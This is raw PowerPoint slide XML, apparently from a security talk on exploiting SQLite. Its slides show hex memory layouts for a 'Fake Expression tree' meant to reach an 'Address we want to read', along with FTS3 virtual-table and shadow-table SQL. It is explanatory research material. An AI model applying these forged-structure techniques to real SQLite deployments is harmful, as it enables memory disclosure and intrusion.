          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4901330" y="753557"/>
            <a:ext cx="562839" cy="366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5521281" y="535549"/>
            <a:ext cx="5311490" cy="454487"/>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14969062"/>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3075783"/>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3046988"/>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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 3D 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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63 00 00 00 00 C0 80 00 42 42 42 42 41 41 41 41</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a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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3113892"/>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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511942" y="2248837"/>
            <a:ext cx="5311490" cy="454487"/>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TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2790826" y="2310464"/>
            <a:ext cx="2057400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake Expression tree</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4876799" y="2486419"/>
            <a:ext cx="562839" cy="366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171700" y="465901"/>
            <a:ext cx="2913619" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default Value Expression Tree</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5085610" y="642722"/>
            <a:ext cx="3070061" cy="1832"/>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8183417" y="535550"/>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5" name="Curved Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6648757" y="-383257"/>
            <a:ext cx="1722523" cy="3996152"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43404"/>
              <a:gd name="adj2" fmla="val 10572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211087" y="2466845"/>
            <a:ext cx="2576984" cy="9236"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>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8377373" y="2750538"/>
            <a:ext cx="2230573" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Address we want to read</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9508095" y="2466845"/>
            <a:ext cx="1" cy="381695"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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3029151"/>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3075783"/>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3046988"/>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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 3D 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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63 00 00 00 00 C0 80 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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3113892"/>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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511942" y="2248837"/>
            <a:ext cx="5311490" cy="454487"/>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8" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4876799" y="2486419"/>
            <a:ext cx="562839" cy="366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8183417" y="535550"/>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5" name="Curved Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6648757" y="-383257"/>
            <a:ext cx="1722523" cy="3996152"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43404"/>
              <a:gd name="adj2" fmla="val 10572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237220" y="2468461"/>
            <a:ext cx="2529840" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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5515592" y="4599546"/>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7" name="Curved Connector 6"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6840270" y="2468460"/>
            <a:ext cx="2661871" cy="2131085"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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790826" y="2310464"/>
            <a:ext cx="2057400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake Expression tree</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2639024626"/>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3075783"/>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3046988"/>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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 00 00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 3D 54 A4 C3 21 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 00 00 00 00 00 00 00 00 41 05 04 00 00 00 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>01 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3C 40 54 A4 C3 21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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63 00 00 00 00 C0 80 00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00 40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a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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3113892"/>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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5511942" y="2248837"/>
            <a:ext cx="5311490" cy="454487"/>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8" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4876799" y="2486419"/>
            <a:ext cx="562839" cy="366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8183417" y="535550"/>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5" name="Curved Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6648757" y="-383257"/>
            <a:ext cx="1722523" cy="3996152"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43404"/>
              <a:gd name="adj2" fmla="val 10572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237220" y="2468461"/>
            <a:ext cx="2529840" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225">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5515592" y="4599546"/>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7" name="Curved Connector 6"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6840270" y="2468460"/>
            <a:ext cx="2661871" cy="2131085"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">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2790826" y="2310464"/>
            <a:ext cx="2057400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake Expression tree</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390646" y="444254"/>
            <a:ext cx="4125192" cy="615553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO table2100(A_0) VALUES (1337);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22576469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Shadow Tables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="158620" y="1825624"/>
            <a:ext cx="11905862" cy="4911078"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="4B4B4B"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> VIRTUAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TABLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USING</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> fts3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t>subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBDE2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VALUES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61CE3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'sample subject1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:latin typeface="Monaco"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
